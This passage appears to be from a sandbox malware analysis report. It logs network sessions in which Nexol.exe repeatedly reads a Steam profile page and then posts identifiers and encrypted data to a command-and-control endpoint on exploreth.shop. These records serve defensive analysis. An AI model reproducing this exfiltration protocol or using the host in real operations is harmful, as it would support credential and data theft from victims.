Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 22:59:44 GMT Content-Length: 35720 Connection: close Set-Cookie: sessionid=12b168a4e35f2451fbbb4295; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cc0f181fbe5ce05fc270cb5f240b10db6; path=/; secure; HttpOnly; SameSite=None
2025-03-11 22:59:44 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 22:59:44 UTC	10154	IN	Data Raw: 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
2025-03-11 22:59:44 UTC	11144	IN	Data Raw: 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f Data Ascii: ;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BASE_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49732	104.21.16.1	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 22:59:46 UTC	272	OUT	POST /gJKDA HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0yX8D6Sh4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8747 Host: exploreth.shop
2025-03-11 22:59:46 UTC	8747	OUT	Data Raw: 2d 2d 30 79 58 38 44 36 53 68 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 65 31 66 62 63 32 38 35 30 34 33 64 32 33 62 61 32 65 33 31 34 66 34 66 66 38 30 62 63 36 64 61 37 39 66 39 36 61 61 35 64 34 62 38 65 61 31 33 62 31 39 37 39 34 30 0d 0a 2d 2d 30 79 58 38 44 36 53 68 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 79 58 38 44 36 53 68 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 37 33 46 38 39 43 46 41 39 31 39 39 34 31 Data Ascii: --0yX8D6Sh4Content-Disposition: form-data; name="uid"7e1fbc285043d23ba2e314f4ff80bc6da79f96aa5d4b8ea13b197940--0yX8D6Sh4Content-Disposition: form-data; name="pid"2--0yX8D6Sh4Content-Disposition: form-data; name="hwid"EA73F89CFA919941
2025-03-11 22:59:47 UTC	818	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 22:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtieTqT7qZTKybIK2oCjp9%2FvaWsGQXMGUUnQjV8a0T0Xe9jH9GbOxu5ktIP8C9lSHUkiyx3XQIbXynTZ8krMOxPzA0yjpN%2FOC8lY2%2BGJM5xSazieqf1GY%2BNIpquZznSGNQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91eeaa089ca9d6f4-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=27476&min_rtt=25341&rtt_var=10830&sent=9&recv=13&lost=0&retrans=0&sent_bytes=2832&recv_bytes=9677&delivery_rate=84015&cwnd=189&unsent_bytes=0&cid=514f4a419460def3&ts=729&x=0"
2025-03-11 22:59:47 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 32 38 2e 38 39 2e 31 33 32 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 73.128.89.132"}}
2025-03-11 22:59:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49733	23.197.127.21	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 22:59:49 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 22:59:50 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 22:59:49 GMT Content-Length: 35720 Connection: close Set-Cookie: sessionid=e699994428428f4cb3125064; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cc0f181fbe5ce05fc270cb5f240b10db6; path=/; secure; HttpOnly; SameSite=None
2025-03-11 22:59:50 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 22:59:50 UTC	10154	IN	Data Raw: 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
2025-03-11 22:59:50 UTC	11144	IN	Data Raw: 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f Data Ascii: ;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BASE_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49734	104.21.16.1	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 22:59:52 UTC	281	OUT	POST /gJKDA HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=wa2U7s7exKFLtjeq5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20440 Host: exploreth.shop
2025-03-11 22:59:52 UTC	15331	OUT	Data Raw: 2d 2d 77 61 32 55 37 73 37 65 78 4b 46 4c 74 6a 65 71 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 65 31 66 62 63 32 38 35 30 34 33 64 32 33 62 61 32 65 33 31 34 66 34 66 66 38 30 62 63 36 64 61 37 39 66 39 36 61 61 35 64 34 62 38 65 61 31 33 62 31 39 37 39 34 30 0d 0a 2d 2d 77 61 32 55 37 73 37 65 78 4b 46 4c 74 6a 65 71 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 77 61 32 55 37 73 37 65 78 4b 46 4c 74 6a 65 71 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 Data Ascii: --wa2U7s7exKFLtjeq5Content-Disposition: form-data; name="uid"7e1fbc285043d23ba2e314f4ff80bc6da79f96aa5d4b8ea13b197940--wa2U7s7exKFLtjeq5Content-Disposition: form-data; name="pid"3--wa2U7s7exKFLtjeq5Content-Disposition: form-data; name="h
2025-03-11 22:59:52 UTC	5109	OUT	Data Raw: 14 89 18 f9 44 66 da c5 4a 9a e1 6f 5a 13 e2 ad c6 72 47 32 89 a3 af 21 8c 9e 67 3e a4 3a 1a 08 b7 5f c0 6c 87 5c ee 4c d7 7d 7d ac 24 b8 31 9f f3 7d 69 af 43 1a 43 bc b3 e5 bf fb 8d be 0e 6a 17 f9 66 3e 20 56 f3 d6 a7 46 b1 3e 17 d3 0a 00 58 db 2e 66 65 ff ed 2e a1 95 31 e1 25 be 9a 78 55 23 33 64 1b 80 d0 02 ac d8 78 c6 4e ee 88 96 fe bd c9 39 0b c5 cb 24 3e 6f 8f 60 a0 d7 e1 9d 0c 16 fb 51 b7 05 90 8d 4e 52 2a 1b ee f2 88 47 c4 59 ad 9c 17 8f e5 81 4b 60 f2 70 24 2b 9c b2 b3 a8 ba a4 a0 69 30 56 c5 54 1a f9 f1 aa 3f 0a 1e 3c 2b 82 ef db 04 e1 18 ca 87 06 9a 8a 0c 9b 1f db 21 73 e8 73 62 d6 c8 33 6e da b2 07 d0 dc 54 d3 83 6b 8e 96 10 dd 4c d7 97 6f 34 a7 ad c6 4b c2 c1 e3 4e 46 99 4b 3b 22 54 e9 37 40 49 d7 b3 ad 64 37 6e bc 16 b6 e1 3e ea 7e 1a 11 02 Data Ascii: DfJoZrG2!g>:_l\L}}$1}iCCjf> VF>X.fe.1%xU#3dxN9$>o`QNR*GYK`p$+i0VT?<+!ssb3nTkLo4KNFK;"T7@Id7n>~
2025-03-11 22:59:53 UTC	817	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 22:59:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kJexWXPVFrUH2UPX22VyztUVRNqURMgmF0gAZqkVvyABprbRgKVqYbztMeJiRjMSYg1q6Q5OMWSEN%2BR74L81bOzxDm8btnQua8dZ74x52gq77xgCI5ECJWC8li%2B3rPFL2g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91eeaa2d4b5b3962-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20757&min_rtt=19930&rtt_var=7258&sent=19&recv=26&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21401&delivery_rate=109212&cwnd=231&unsent_bytes=0&cid=668df5824bf25155&ts=1071&x=0"
2025-03-11 22:59:53 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 32 38 2e 38 39 2e 31 33 32 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 73.128.89.132"}}
2025-03-11 22:59:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49735	23.197.127.21	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 22:59:57 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 22:59:58 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 22:59:57 GMT Content-Length: 35720 Connection: close Set-Cookie: sessionid=f3d90bcf59f48d664a85922a; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cc0f181fbe5ce05fc270cb5f240b10db6; path=/; secure; HttpOnly; SameSite=None
2025-03-11 22:59:58 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 22:59:58 UTC	10154	IN	Data Raw: 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
2025-03-11 22:59:58 UTC	11144	IN	Data Raw: 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f Data Ascii: ;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BASE_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49736	104.21.16.1	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 22:59:59 UTC	271	OUT	POST /gJKDA HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=pPpTBgFq User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2686 Host: exploreth.shop
2025-03-11 22:59:59 UTC	2686	OUT	Data Raw: 2d 2d 70 50 70 54 42 67 46 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 65 31 66 62 63 32 38 35 30 34 33 64 32 33 62 61 32 65 33 31 34 66 34 66 66 38 30 62 63 36 64 61 37 39 66 39 36 61 61 35 64 34 62 38 65 61 31 33 62 31 39 37 39 34 30 0d 0a 2d 2d 70 50 70 54 42 67 46 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 70 50 70 54 42 67 46 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 37 33 46 38 39 43 46 41 39 31 39 39 34 31 37 41 36 Data Ascii: --pPpTBgFqContent-Disposition: form-data; name="uid"7e1fbc285043d23ba2e314f4ff80bc6da79f96aa5d4b8ea13b197940--pPpTBgFqContent-Disposition: form-data; name="pid"1--pPpTBgFqContent-Disposition: form-data; name="hwid"EA73F89CFA9199417A6
2025-03-11 23:00:00 UTC	817	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 23:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zIO304OaXWjWG%2BBAjmsARAFvHa00Hfz9dtSPCsgVPPLBPbcB%2BWoqp7GnA0FBQqMJP2oGj99TGzFr8v4kyQe0DJ7%2BxrUSwB1BCdE%2FAF0lPM7KYAIVjXXx3U0Eq9LSu8E6CA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91eeaa5d0fa7206a-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23938&min_rtt=23853&rtt_var=6857&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2832&recv_bytes=3593&delivery_rate=119560&cwnd=246&unsent_bytes=0&cid=e166b6895cd5c1dd&ts=817&x=0"
2025-03-11 23:00:00 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 32 38 2e 38 39 2e 31 33 32 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 73.128.89.132"}}
2025-03-11 23:00:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
